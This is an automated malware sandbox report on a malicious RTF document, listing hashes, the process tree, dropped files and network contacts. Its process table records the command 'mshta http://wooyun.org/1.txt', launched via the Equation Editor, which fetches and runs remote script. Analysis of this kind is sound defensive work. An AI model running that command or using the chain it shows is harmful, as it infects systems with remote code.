File name: | f45dafd3e0a08a243eab4202c3797140.rtf |
Full analysis: | https://app.any.run/tasks/63ac6d09-8e23-4b6e-9db8-19cb2a779701 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 02:56:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | F45DAFD3E0A08A243EAB4202C3797140 |
SHA1: | 1177E06DD5392DA2BD3AA8CEB8368CAE35FE967D |
SHA256: | F8C7F9AE9D4470CB4F495D0BACA4E5D928AC50816412D7E3A71AC5DECB2C0241 |
SSDEEP: | 48:Mp54iWuutGfEjNMtvbDSj3xMa27983O+G+phyD9LhQQQzQUAUxNhHb11gb90RCZZ:MwuUG5VoWx2YKyRFVS1E9fNDHy4h/1N/ |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3324 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f45dafd3e0a08a243eab4202c3797140.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2872 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
896 | mshta http://wooyun.org/1.txt | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFA1C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3324 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B4A3A7010D8FEA8F141CA79DBF1C0A7F | SHA256:1AE5A8F017BE4D661214AD5059D36CCC00CE7BC44428DA72655DCE7695B6AB06 | |||
896 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\notice[1].png | image | |
MD5:B9A4DCD8C2F300CD737E55CA9AB811B6 | SHA256:554E7D779EC74F1281809F73A32ACDDBA174F9C947ADC6EDCBBCB5B51AB21F8D | |||
3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$5dafd3e0a08a243eab4202c3797140.rtf | pgc | |
MD5:E54B28D6DBBF1E71F999DF2C0EE60C1D | SHA256:F1DAD4CF7CF3BEF518B468C9FD72123234B72D103BCB49ED8F1FA387A3C60EE6 | |||
896 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1[1].htm | html | |
MD5:E0ACFEB017FBB4DB7548014B98D08D88 | SHA256:60EDC82849578DAC87A6CEFD62E1E34A208DFA6E677606AA1D785427073A299D | |||
3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BDA9440.wmf | wmf | |
MD5:975B76E8E77D57CC386AF977A08B1E31 | SHA256:8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
896 | mshta.exe | GET | 200 | 162.243.9.231:80 | http://wooyun.org/1.txt | US | html | 218 b | unknown |
896 | mshta.exe | GET | 200 | 162.243.9.231:80 | http://www.wooyun.org/notice.png | US | image | 37.8 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
896 | mshta.exe | 162.243.9.231:80 | wooyun.org | Digital Ocean, Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
wooyun.org |
| unknown |
www.wooyun.org |
| unknown |